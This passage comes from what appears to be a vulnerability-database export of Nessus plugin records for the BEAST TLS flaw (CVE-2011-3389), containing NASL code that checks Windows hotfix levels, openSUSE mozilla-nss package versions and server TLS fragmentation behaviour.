(get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nwinver = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvuln = 0;\nif (winver == '5.2')\n{\n rootfile = hotfix_get_systemroot();\n if (!rootfile) exit(1, \"Can't get the system root.\");\n\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\n path = ereg_replace(pattern:\"^[A-Za-z](.*)\", replace:\"\\1\", string:rootfile);\n\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n port = kb_smb_transport();\n\n if(! smb_session_init(timeout: get_read_timeout() + 10)) audit(AUDIT_FN_FAIL, \"smb_session_init\");\n\n hcf_init = TRUE;\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n winsxs = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\WinSxS\", string:rootfile);\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"WinHTTP\", file_pat:\"^winhttp\\.dll$\", max_recurse:1);\n\n vuln += hotfix_check_winsxs(os:'5.2', sp:2, files:files, versions:make_list('5.2.3790.4929'), max_versions:make_list('5.2.3790.9999'), bulletin:bulletin, kb:'2638806');\n}\n\nkb = '2585542';\nif (!is_accessible_share()) exit(1, \"is_accessible_share() failed.\");\nif (\n # Windows 7 / Server 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Schannel.dll\", version:\"6.1.7601.21861\", min_version:\"6.1.7601.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Schannel.dll\", version:\"6.1.7601.17725\", min_version:\"6.1.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Schannel.dll\", version:\"6.1.7600.21092\", min_version:\"6.1.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Schannel.dll\", version:\"6.1.7600.16915\", min_version:\"6.1.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Schannel.dll\", version:\"6.0.6002.22742\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Schannel.dll\", version:\"6.0.6002.18541\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Schannel.dll\", version:\"5.2.3790.4935\", dir:\"\\System32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Schannel.dll\", version:\"5.1.2600.6175\", dir:\"\\System32\", bulletin:bulletin, kb:kb)\n)\n{\n vuln++;\n hotfix_check_fversion_end();\n}\nhotfix_check_fversion_end();\n\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_warning();\n\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:14", "description": "- Added a patch to fix errors in the pkcs11n.h header file. (bmo#702090)\n\n - update to 3.13.1 RTM\n\n - better SHA-224 support (bmo#647706)\n\n - fixed a regression (causing hangs in some situations) introduced in 3.13 (bmo#693228)\n\n - update to 3.13.0 RTM\n\n - SSL 2.0 is disabled by default\n\n - A defense against the SSL 3.0 and TLS 1.0 CBC chosen plaintext attack demonstrated by Rizzo and Duong (CVE-2011-3389) is enabled by default. Set the SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable it.\n\n - SHA-224 is supported\n\n - Ported to iOS. (Requires NSPR 4.9.)\n\n - Added PORT_ErrorToString and PORT_ErrorToName to return the error message and symbolic name of an NSS error code\n\n - Added NSS_GetVersion to return the NSS version string\n\n - Added experimental support of RSA-PSS to the softoken only\n\n - NSS_NoDB_Init does not try to open /pkcs11.txt and /secmod.db anymore (bmo#641052, bnc#726096)", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : mozilla-nss (openSUSE-2011-100) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libfreebl3", "p-cpe:/a:novell:opensuse:libfreebl3-32bit", "p-cpe:/a:novell:opensuse:libfreebl3-debuginfo", "p-cpe:/a:novell:opensuse:libfreebl3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsoftokn3", "p-cpe:/a:novell:opensuse:libsoftokn3-32bit", "p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo", "p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss", "p-cpe:/a:novell:opensuse:mozilla-nss-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-certs", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-debugsource", "p-cpe:/a:novell:opensuse:mozilla-nss-devel", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-tools", "p-cpe:/a:novell:opensuse:mozilla-nss-tools-debuginfo", "cpe:/o:novell:opensuse:12.1"], "id": "OPENSUSE-2011-100.NASL", "href": "https://www.tenable.com/plugins/nessus/74514", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2011-100.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74514);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"openSUSE Security Update : mozilla-nss (openSUSE-2011-100) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Added a patch to fix errors in the pkcs11n.h header\n file. (bmo#702090)\n\n - update to 3.13.1 RTM\n\n - better SHA-224 support (bmo#647706)\n\n - fixed a regression (causing hangs in some situations)\n introduced in 3.13 (bmo#693228)\n\n - update to 3.13.0 RTM\n\n - SSL 2.0 is disabled by default\n\n - A defense against the SSL 3.0 and TLS 1.0 CBC chosen\n plaintext attack demonstrated by Rizzo and Duong\n (CVE-2011-3389) is enabled by default. Set the\n SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable it.\n\n - SHA-224 is supported\n\n - Ported to iOS. (Requires NSPR 4.9.)\n\n - Added PORT_ErrorToString and PORT_ErrorToName to return\n the error message and symbolic name of an NSS error code\n\n - Added NSS_GetVersion to return the NSS version string\n\n - Added experimental support of RSA-PSS to the softoken\n only\n\n - NSS_NoDB_Init does not try to open /pkcs11.txt and\n /secmod.db anymore (bmo#641052, bnc#726096)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=726096\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected mozilla-nss packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libfreebl3-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libfreebl3-debuginfo-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libsoftokn3-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libsoftokn3-debuginfo-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-certs-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-certs-debuginfo-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-debuginfo-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-debugsource-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-devel-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-sysinit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-sysinit-debuginfo-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-tools-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-nss-tools-debuginfo-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libfreebl3-debuginfo-32bit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libsoftokn3-debuginfo-32bit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-32bit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-debuginfo-32bit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-nss-debuginfo-32bit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-nss-sysinit-32bit-3.13.1-9.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-nss-sysinit-debuginfo-32bit-3.13.1-9.11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libfreebl3 / libfreebl3-32bit / libfreebl3-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:06", "description": "This plugin has been deprecated and is no longer functional. It was originally written to check Microsoft's workaround for CVE-2011-3389, but was replaced by plugin 57474 which checks for the patch that fixes this CVE.", "cvss3": {}, "published": "2011-09-29T00:00:00", "type": "nessus", "title": "Deprecated", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2013-05-13T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_KB2588513.NASL", "href": "https://www.tenable.com/plugins/nessus/56333", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2012/02/08. Deprecated by smb_nt_ms12-006.nasl.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56333);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_bugtraq_id(49778);\n\n script_name(english:\"Deprecated\");\n script_summary(english:\"Checks if RC4 has been prioritized.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin has been deprecated and is no longer functional. It\nwas originally written to check Microsoft's workaround for\nCVE-2011-3389, but was replaced by plugin 57474 which checks for\nthe patch that fixes this CVE.\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/advisory/2588513\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Use smb_nt_ms12-006.nasl (plugin ID 57474) instead\");\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nwinver = get_kb_item_or_exit('SMB/WindowsVersion');\n\nif (winver != '6.0') exit(1, 'The workaround only applies to Windows Vista and 2008.');\n\nname = kb_smb_name();\nport = kb_smb_transport();\nif (!get_port_state(port)) exit(1, 'Port '+port+' is not open.');\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1, 'Can\\'t open socket on port '+port+'.');\nsession_init(socket:soc, hostname:name);\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:'IPC$');\nif (rc != 1)\n{\n NetUseDel();\n exit(1, 'Can\\'t connect to IPC$ share.');\n}\n\n# Connect to the remote registry\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n\n NetUseDel();\n exit(1, 'Can\\'t connect to remote registry.');\n}\n\nvuln = FALSE;\nsuites = make_list();\nkey = 'SOFTWARE\\\\Policies\\\\Microsoft\\\\Cryptography\\\\Configuration\\\\SSL\\\\00010002';\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n item = RegQueryValue(handle:key_h, item:'Functions');\n if (isnull(item)) vuln = TRUE;\n else suites = split(item[1], sep:',', keep:FALSE);\n RegCloseKey(handle:key_h);\n}\nRegCloseKey(handle:hklm);\nNetUseDel();\n\nif ((max_index(suites) < 1) && !vuln) exit(1, 'Couldn\\'t get the SSL Cipher Suite Order from the remote host.');\n\nif (\n !vuln &&\n suites[0] != 'TLS_RSA_WITH_RC4_128_SHA' &&\n suites[0] != 'TLS_RSA_WITH_RC4_128_MD5' &&\n suites[0] != 'SSL_CK_RC4_128_WITH_MD5'\n) vuln = TRUE;\n \n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report = '\\n The \\'RC4\\' algorithm hasn\\'t been prioritized on the remote host.\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, 'The host is not affected.');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:28", "description": "A vulnerability exists in SSL 3.0 and TLS 1.0 that could allow information disclosure if an attacker intercepts encrypted traffic served from an affected system.\n\nTLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected.\n\nThis plugin tries to establish an SSL/TLS remote connection using an affected SSL version and cipher suite and then solicits return data.\nIf returned application data is not fragmented with an empty or one-byte record, it is likely vulnerable.\n\nOpenSSL uses empty fragments as a countermeasure unless the 'SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS' option is specified when OpenSSL is initialized.\n\nMicrosoft implemented one-byte fragments as a countermeasure, and the setting can be controlled via the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\SendExtraRecord.\n\nTherefore, if multiple applications use the same SSL/TLS implementation, some may be vulnerable while others may not be, depending on whether or not a countermeasure has been enabled.\n\nNote that this plugin detects the vulnerability in the SSLv3/TLSv1 protocol implemented in the server. It does not detect the BEAST attack where it exploits the vulnerability at HTTPS client-side (i.e., Internet browser). The detection at server-side does not necessarily mean your server is vulnerable to the BEAST attack, because the attack exploits the vulnerability at the client-side, and both SSL/TLS clients and servers can independently employ the split record countermeasure.", "cvss3": {}, "published": "2012-04-16T00:00:00", "type": "nessus", "title": "SSL/TLS Protocol Initialization Vector Implementation Information Disclosure Vulnerability (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": [], "id": "SSL3_TLS1_IV_IMPL_INFO_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/58751", "sourceData": "#TRUSTED 1c09e57918a34eb380475831ff14af56c6a719d156a8b7fa6cb7553e658f8a22ac62dbcc9996e7729fa6d14bf83687cc951f1f2f10a651d629e67419f552e4533ca25e6f631c768859627a1a471575658187eaa923dccbfdac42910dc2528657788ad512bcffeb6005787672d1b0451bf28ac08de4509757325eb858a9172e61149083219a1b8f90e5b58db207c0b38cb5d2d14622bb8d5ed425d3d933c36c25872e6bb88776827a0317d53557989e4380bc2516e85533de1e4cb169368d0dd17d7fc838ef37f3a9eaa415fb0bac21e25e6a226ecb93de57d5ab1f6c51401082713ce479cb38866df0c7002ed7e2aae7c32e42817078a07a25a8accdcb5d1aef1b5a8b98ff45d9bbce57a0256e3184b125bcea13b14f7b88333258165a1b20367b445b2af45c48f60799c2d7427746060ab5211190c7964e742b7e12820e0858b90b0f6140a4714691fd456e3b012e711ee22947117ed1c1fe7c658276fb211774cb92d35a5b6ea26ee9d61abaf0a1a0504083b274823fed5fd0754ad17d4a6aa558750b4e0173b73f0d3d07a47337e0741026a1179c97a672296d49a6b1a60c8b8f320b15c4616b41fbcb6ec2215294eb81ca5130cd383c22561db3bf62ffdc41822728a634f3e47cad5b0b99d7abe51aaaf1a97c70b5f00aa9aaf37530b40912e0988c6bdfb679059e6b22a7ccf53bc6a746e8e50abed07d7372ae11133e99\n#TRUST-RSA-SHA256 7f1a56671af4ff831be079d04ae1817a8d85bd3aca74dbe89504a356f731ec1ed5332c6365a749070a483bbf19b4b3e7e5724902fdb9a2c7ea786fa282eeebf258e07bff782856dbc8ff001c602d8184063bf97282c87ef5e236ee565662711bbb7d848785f4319a12934198c543c382e7e2e30fa0c77a4284f841a75f2d58e6f992c156b8b87b1c6bb5591d6dc607bec5183f9a192274e13beb5cfbacfa36de7a90397598e7501cf1f97597b1aa28dfcf47277044445ddc75133dd74debc776051b1ea8606ba6765a0b2d6cda721332d1c88a1a7354c65cfed7bece58e9813b340d90fedee490a70524ffef05913f88036c952619271605f5e5ee04749ecf1517a4abff9a51c1ce78497b018e77a6e2a3dc9216d1a7e8df2870516c4b9468338cf4df456e955c529c7fcdc11f4f5f842e1821f82dd7294b990e3f1aa4d004d5de02087633cace8508484f8f17f1675d137c4672be69ba628a0042eea4f20ab592c4645f44ccd688f02733937031b204f9056994f5310e6406fb6d4167f246d4e0df6392768610b581cf28b2d6616dc52691f99f7d544bdd665cccf735efc2f8ecd00d67947942283485ed729b0069dfc1a909cae42471ea23f5d7f6ad0912efa5550929a1496a09f9aea266bbf9f81928c90f13215ace006182e8d364074b058aa32ed6b667bbab393080ba67eb03da984146462dea734030088e9cf7c91532\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58751);\n script_version(\"1.43\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_bugtraq_id(49778);\n script_xref(name:\"CERT\", value:\"864643\");\n script_xref(name:\"MSFT\", value:\"MS12-006\");\n script_xref(name:\"IAVB\", value:\"2012-B-0006\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"SSL/TLS Protocol Initialization Vector Implementation Information Disclosure Vulnerability (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It may be possible to obtain sensitive information from the remote\nhost with SSL/TLS-enabled services.\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in SSL 3.0 and TLS 1.0 that could allow\ninformation disclosure if an attacker intercepts encrypted traffic\nserved from an affected system.\n\nTLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are\nnot affected.\n\nThis plugin tries to establish an SSL/TLS remote connection using an\naffected SSL version and cipher suite and then solicits return data.\nIf returned application data is not fragmented with an empty or\none-byte record, it is likely vulnerable.\n\nOpenSSL uses empty fragments as a countermeasure unless the\n'SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS' option is specified when OpenSSL\nis initialized.\n\nMicrosoft implemented one-byte fragments as a countermeasure, and the\nsetting can be controlled via the registry key\nHKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\SendExtraRecord.\n\nTherefore, if multiple applications use the same SSL/TLS\nimplementation, some may be vulnerable while others may not be,\ndepending on whether or not a countermeasure has been enabled.\n\nNote that this plugin detects the vulnerability in the SSLv3/TLSv1\nprotocol implemented in the server. It does not detect the BEAST\nattack where it exploits the vulnerability at HTTPS client-side\n(i.e., Internet browser). The detection at server-side does not\nnecessarily mean your server is vulnerable to the BEAST attack,\nbecause the attack exploits the vulnerability at the client-side, and\nboth SSL/TLS clients and servers can independently employ the split\nrecord countermeasure.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/tls-cbc.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2011/09/23/chromeandbeast.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://vnhacker.blogspot.com/2011/09/beast.html\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-006\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?649b81c1\");\n # https://support.microsoft.com/en-us/help/2643584/ms12-006-vulnerability-in-ssl-tls-could-allow-information-disclosure-j\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?84775fd6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.msdn.microsoft.com/kaushal/2012/01/20/fixing-the-beast/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Configure SSL/TLS servers to only use TLS 1.1 or TLS 1.2 if supported.\nConfigure SSL/TLS servers to only support cipher suites that do not\nuse block ciphers. Apply patches if available.\n\nNote that additional configuration may be required after the\ninstallation of the MS12-006 security update in order to enable the\nsplit-record countermeasure. See Microsoft KB2643584 for details.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-3389\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n 